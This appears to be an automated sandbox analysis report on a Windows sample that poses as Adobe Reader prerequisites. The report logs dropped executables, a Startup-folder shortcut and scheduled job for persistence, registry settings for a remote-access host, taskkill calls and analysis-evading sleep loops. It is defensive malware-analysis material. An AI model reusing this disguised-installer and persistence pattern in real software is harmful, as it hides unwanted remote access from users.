Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Uses tasklist.exe to query information about running processesShow sources
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist
Reads the Windows registered owner settingsShow sources
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Found GUI installer (many successful clicks)Show sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeAutomated click: Next >
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeAutomated click: Next >
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeAutomated click: Install
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeAutomated click: Install
Source: C:\Windows\System32\taskkill.exeAutomated click: Install
Source: C:\Windows\System32\taskkill.exeAutomated click: Next >
Source: C:\Windows\System32\taskkill.exeAutomated click: Next >
Source: C:\Windows\System32\taskkill.exeAutomated click: Install
Uses Rich Edit ControlsShow sources
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeFile opened: C:\Windows\system32\msftedit.DLL
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Creates a software uninstall entryShow sources
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\H&S Tech 4.0.0.1
Submission file is bigger than most known malware samplesShow sources
Source: CDaNsQ7Rrd.exeStatic file information: File size 2523958 > 1048576
PE file contains a mix of data directories often seen in goodwareShow sources
Source: CDaNsQ7Rrd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CDaNsQ7Rrd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CDaNsQ7Rrd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CDaNsQ7Rrd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CDaNsQ7Rrd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CDaNsQ7Rrd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: CDaNsQ7Rrd.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: CDaNsQ7Rrd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: E:\Branch\win\Release\stubs\x86\ExternalUi.pdb source: CDaNsQ7Rrd.exe
Source: Binary string: E:\Branch\win\Release\custact\x86\AICustAct.pdb source: CDaNsQ7Rrd.exe
Source: Binary string: E:\Branch\win\Release\stubs\x86\ExternalUi.pdbL source: CDaNsQ7Rrd.exe
PE file contains a valid data directory to section mappingShow sources
Source: CDaNsQ7Rrd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CDaNsQ7Rrd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CDaNsQ7Rrd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CDaNsQ7Rrd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CDaNsQ7Rrd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
PE file contains an invalid checksumShow sources
Source: CDaNsQ7Rrd.exeStatic PE information: real checksum: 0x16bb7d should be: 0x2781b4
Source: setup.exe.part.2.drStatic PE information: real checksum: 0x3b377 should be:
Source: 7za.dll.8.drStatic PE information: real checksum: 0x0 should be: 0x4352d
Source: fp.exe.23.drStatic PE information: real checksum: 0x3b377 should be:
Source: 7zaa.exe.8.drStatic PE information: real checksum: 0x0 should be: 0xae01b
PE file contains sections with non-standard namesShow sources
Source: 7za.dll.8.drStatic PE information: section name: .sxdata
Source: 7zaa.exe.8.drStatic PE information: section name: .sxdata
Source: armforce.exe.25.drStatic PE information: section name: .eh_fram

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file dataShow sources
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Drops PE filesShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSIEC54.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSIECF5.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\Prereq.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeFile created: C:\inst_fold\7zaa.exeJump to dropped file
Source: C:\inst_fold\7zaa.exeFile created: C:\inst_fold\fp.exeJump to dropped file
Source: C:\inst_fold\fp.exeFile created: C:\inst_fold\armstart.exeJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aipackagechainer.exeJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI31A3.tmpJump to dropped file
Source: C:\inst_fold\fp.exeFile created: C:\inst_fold\armforce.exeJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSIB368.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe.partJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI973D.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Prereq.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\lzmaextractor.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeFile created: C:\inst_fold\7za.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\lzmaextractor.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI2A4F.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI9546.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI9605.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aipackagechainer.exeJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI3093.tmpJump to dropped file
Source: C:\inst_fold\fp.exeFile created: C:\inst_fold\armstatus.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeFile created: C:\inst_fold\7zxa.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI1F56.tmpJump to dropped file
Source: C:\inst_fold\armstart.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exeJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI6D94.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI1B1D.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aicustact.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI31FE.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI61FE.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI2B4A.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aicustact.dllJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe.partJump to dropped file

Boot Survival:

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)Show sources
Source: C:\Windows\explorer.exeWindow found: window name: Progman
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\armwake.lnk
Creates job files (autostart)Show sources
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Tasks\{DE4C87A4-56DF-40F2-BF3B-9314F5F8610B}.jobJump to behavior
Stores files to the Windows start menu directoryShow sources
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\armwake.lnk

Hooking and other Techniques for Hiding and Protection:

barindex
Stores large binary data to the registryShow sources
Source: C:\Windows\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters Options
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\regedit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Checks the free space of harddrivesShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\Users\user\AppData\Roaming\Adobe FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\Users\user\AppData\Roaming\Adobe FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeFile Volume queried: C:\ FullSizeInformation
Enumerates the file systemShow sources
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\msiexec.exeWindow / User API: threadDelayed 942
Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 878
Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 381
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSIEC54.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSIECF5.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\Prereq.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\lzmaextractor.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aipackagechainer.exeJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI9605.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeDropped PE file which has not been started: C:\inst_fold\7zxa.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI1F56.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aipackagechainer.exeJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI6D94.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI31A3.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI1B1D.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aicustact.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI31FE.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Prereq.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI61FE.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\lzmaextractor.dllJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI2B4A.tmpJump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aicustact.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeDropped PE file which has not been started: C:\inst_fold\7za.dllJump to dropped file
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\msiexec.exe TID: 3368Thread sleep count: 942 > 30
Source: C:\Windows\System32\msiexec.exe TID: 3368Thread sleep time: -56520000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 3584Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 2304Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\msiexec.exe TID: 2192Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\msiexec.exe TID: 2392Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 1396Thread sleep time: -300000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 2796Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\msiexec.exe TID: 2468Thread sleep count: 142 > 30
